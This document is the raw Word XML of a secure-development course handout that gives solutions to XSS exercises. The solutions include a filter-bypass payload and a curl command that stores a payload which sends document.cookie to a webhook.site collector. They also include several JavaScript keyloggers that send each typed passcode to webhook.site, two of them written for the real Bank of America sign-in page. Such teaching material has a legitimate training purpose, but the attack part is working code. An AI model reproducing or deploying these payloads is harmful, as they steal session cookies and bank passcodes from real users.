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7439E" w:rsidRDefault="00D57631" w:rsidP="00C3366C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SDL Course </w:t>
      </w:r>
      <w:r w:rsidR="0049447C">
        <w:t xml:space="preserve">Solutions to Selected </w:t>
      </w:r>
      <w:r w:rsidR="00C22657">
        <w:t>Exercises:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C22657" w:rsidRDefault="00C22657" w:rsidP="00C3366C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C22657" w:rsidRDefault="00C22657" w:rsidP="00FC055F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C22657" w:rsidRDefault="00C22657" w:rsidP="00C3366C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC055F" w:rsidRDefault="00C22657" w:rsidP="00C3366C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>In simplexssfiltering</w:t>
      </w:r>
      <w:r w:rsidR="00FC055F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C22657" w:rsidRDefault="00FC055F" w:rsidP="00FC055F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00C22657">
        <w:t>ind a payload to bypass filtering and get XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002223EC" w:rsidRPr="002223EC" w:rsidRDefault="004E22E0" w:rsidP="002223EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:softHyphen/>
      </w:r>
      <w:r w:rsidR="002223EC" w:rsidRPr="002223EC">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>http://localhost:5000/aaa%3CScript%3Ealert()%3C/script%3E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D57631" w:rsidRDefault="00D57631" w:rsidP="00C3366C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Try the payload in </w:t>
      </w:r>
      <w:r w:rsidR="00FC055F">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.b in simplestoredxss. Why doesn’t it work? Can you </w:t>
      </w:r>
      <w:r w:rsidR="000509CE">
        <w:t>find a payload that works</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="000509CE">
        <w:t xml:space="preserve"> You can use curl.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000509CE" w:rsidRPr="000509CE" w:rsidRDefault="000509CE" w:rsidP="000509CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000509CE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>curl 'http://localhost:5000/users/create/moshe%3Cbody%20onload=open(%22https:\\webhook.site\b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9%3fa%22+document.cookie)%3E'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D57631" w:rsidRDefault="00D57631" w:rsidP="00C3366C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A keylogger is malware that records victims’ keystrokes to steal passwords and secrets that they type. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B17BAF" w:rsidRPr="00FC055F" w:rsidRDefault="00D57631" w:rsidP="00FC055F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You have XSS on </w:t>
      </w:r>
      <w:r w:rsidR="00C3366C">
        <w:t>Bank of America</w:t>
      </w:r>
      <w:r w:rsidR="00B17BAF">
        <w:t>sign-in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> page. Use the dev console to write XSS payload that implements keylogger</w:t>
      </w:r>
      <w:r w:rsidR="00B17BAF">
        <w:t xml:space="preserve"> to steal the passcode</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00FC055F" w:rsidRPr="004861D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.bankofamerica.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B17BAF" w:rsidRDefault="00B17BAF" w:rsidP="00C3366C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B17BAF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="858520"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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BAF" w:rsidRDefault="00B17BAF" w:rsidP="00C3366C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B17BAF" w:rsidRPr="000509CE" w:rsidRDefault="00B17BAF" w:rsidP="000509CE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000509CE">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Solution in local</w:t>
      </w:r>
      <w:r w:rsidR="000509CE" w:rsidRPr="000509CE">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidRPr="000509CE">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000509CE">
        <w:t>http://localhost:5000/%3Cinput%20name=aaa%3E%3Cscript%3Edocument.getElementsByName(%22aaa%22)[0].addEventListener(%22keyup%22,%20function()%7B%20var%20xhttp%20=%20new%20XMLHttpRequest();%20xhttp.onreadystatechange%20=%20function()%20%7B%20if%20(true)%20%7B%20return;%20%7D%20%7D;%20xhttp.open(%22GET%22,%20%22https://webhook.site/b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9?a=%22+document.getElementsByName(%22aaa%22)[0].value,%20true);%20xhttp.send();%20});%3C/script%3E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D57631" w:rsidRPr="000509CE" w:rsidRDefault="000509CE" w:rsidP="00B17BAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Solution in bankofamerica</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B17BAF" w:rsidRPr="00B17BAF" w:rsidRDefault="00B17BAF" w:rsidP="00B17BAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B17BAF">
        <w:t>document.getElementsByName("passcode1")[0].addEventListener("keyup", function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B17BAF" w:rsidRPr="00B17BAF" w:rsidRDefault="00B17BAF" w:rsidP="00B17BAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B17BAF">
        <w:t xml:space="preserve">  var xhttp = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B17BAF" w:rsidRPr="00B17BAF" w:rsidRDefault="00B17BAF" w:rsidP="00B17BAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B17BAF">
        <w:t>xhttp.onreadystatechange = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B17BAF" w:rsidRPr="00B17BAF" w:rsidRDefault="00B17BAF" w:rsidP="00B17BAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B17BAF">
        <w:t xml:space="preserve">    if (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B17BAF" w:rsidRPr="00B17BAF" w:rsidRDefault="00B17BAF" w:rsidP="00B17BAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B17BAF">
        <w:t>return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B17BAF" w:rsidRPr="00B17BAF" w:rsidRDefault="00B17BAF" w:rsidP="00B17BAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B17BAF">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B17BAF" w:rsidRPr="00B17BAF" w:rsidRDefault="00B17BAF" w:rsidP="00B17BAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B17BAF">
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B17BAF" w:rsidRPr="00B17BAF" w:rsidRDefault="00B17BAF" w:rsidP="00B17BAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B17BAF">
        <w:t>xhttp.open("GET", "https://webhook.site/b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9?a="+document.getElementsByTagName("passcode1")[0].value, true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B17BAF" w:rsidRPr="00B17BAF" w:rsidRDefault="00B17BAF" w:rsidP="00B17BAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B17BAF">
        <w:t>xhttp.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B17BAF" w:rsidRDefault="00B17BAF" w:rsidP="00B17BAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B17BAF">
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC055F" w:rsidRDefault="00886CFE" w:rsidP="00FC055F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Another version: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886CFE" w:rsidRDefault="00886CFE" w:rsidP="00FC055F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00886CFE" w:rsidRDefault="00886CFE" w:rsidP="00886CFE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>document.getElementsByName("passcode1")[0].addEventListener("keyup", function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886CFE" w:rsidRDefault="00886CFE" w:rsidP="00886CFE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  var xhttp = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886CFE" w:rsidRDefault="00886CFE" w:rsidP="00886CFE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>xhttp.onreadystatechange = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886CFE" w:rsidRDefault="00886CFE" w:rsidP="00886CFE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886CFE" w:rsidRDefault="00886CFE" w:rsidP="00886CFE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886CFE" w:rsidRDefault="00886CFE" w:rsidP="00886CFE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886CFE" w:rsidRDefault="00886CFE" w:rsidP="00886CFE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886CFE" w:rsidRDefault="00886CFE" w:rsidP="00886CFE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>xhttp.open("GET", "https://webhook.site/9b61fa75-8efd-40a4-9acf-f7922479de3f?a="+document.getElementById("passcode1").value, true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886CFE" w:rsidRDefault="00886CFE" w:rsidP="00886CFE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>xhttp.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886CFE" w:rsidRDefault="00886CFE" w:rsidP="00886CFE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C7FBE" w:rsidRPr="009761EC" w:rsidRDefault="006C7FBE" w:rsidP="009761EC"/>
    <w:sectPr w:rsidR="006C7FBE" w:rsidRPr="009761EC" w:rsidSect="00816A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D60" w:rsidRDefault="001E0D60" w:rsidP="00FC055F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="001E0D60" w:rsidRDefault="001E0D60" w:rsidP="00FC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55F" w:rsidRDefault="00FC05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55F" w:rsidRDefault="00FC055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55F" w:rsidRDefault="00FC05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D60" w:rsidRDefault="001E0D60" w:rsidP="00FC055F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="001E0D60" w:rsidRDefault="001E0D60" w:rsidP="00FC0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55F" w:rsidRDefault="00FC055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55F" w:rsidRDefault="00FC055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55F" w:rsidRDefault="00FC05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0303"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51A47C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4F30AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="535428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EC6424"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51A47C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6E7D30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DDB04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61FEF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD28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223EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7D8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86B50"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1CC8A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22657"/>
    <w:rsid w:val="000509CE"/>
    <w:rsid w:val="001E0D60"/>
    <w:rsid w:val="002223EC"/>
    <w:rsid w:val="0032231A"/>
    <w:rsid w:val="003F0A94"/>
    <w:rsid w:val="0049447C"/>
    <w:rsid w:val="004E22E0"/>
    <w:rsid w:val="0062128C"/>
    <w:rsid w:val="006C7FBE"/>
    <w:rsid w:val="00735138"/>
    <w:rsid w:val="008065E3"/>
    <w:rsid w:val="00816A56"/>
    <w:rsid w:val="00886CFE"/>
    <w:rsid w:val="008C01C3"/>
    <w:rsid w:val="009761EC"/>
    <w:rsid w:val="009A4684"/>
    <w:rsid w:val="009E702A"/>
    <w:rsid w:val="00AA6B04"/>
    <w:rsid w:val="00B17BAF"/>
    <w:rsid w:val="00B47B5A"/>
    <w:rsid w:val="00BC1506"/>
    <w:rsid w:val="00C22657"/>
    <w:rsid w:val="00C3366C"/>
    <w:rsid w:val="00D57631"/>
    <w:rsid w:val="00FC055F"/>
    <w:rsid w:val="00FC4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55F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00FC055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55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55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55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55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55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55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55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55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5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2657"/>
    <w:rPr>
      <w:color w:val="77A2BB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265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C055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C05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55F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC05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55F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FC055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55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55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55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55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055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55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055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055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055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C055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55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055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FC055F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:spacing w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00FC055F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FC055F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FC055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FC055F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055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055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FC055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FC055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FC055F"/>
    <w:rPr>
      <w:smallCaps/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00FC055F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BookTitle">
    <w:name w:val="Book Title"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="00FC055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055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C055F"/>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC055F"/>
    <w:rPr>
      <w:color w:val="957A9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2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kofamerica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AD5754-CD41-1E46-BE52-75C5A6DA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r, Tal (GE Digital)</dc:creator>
  <cp:lastModifiedBy>tal</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-29T12:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-29T12:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>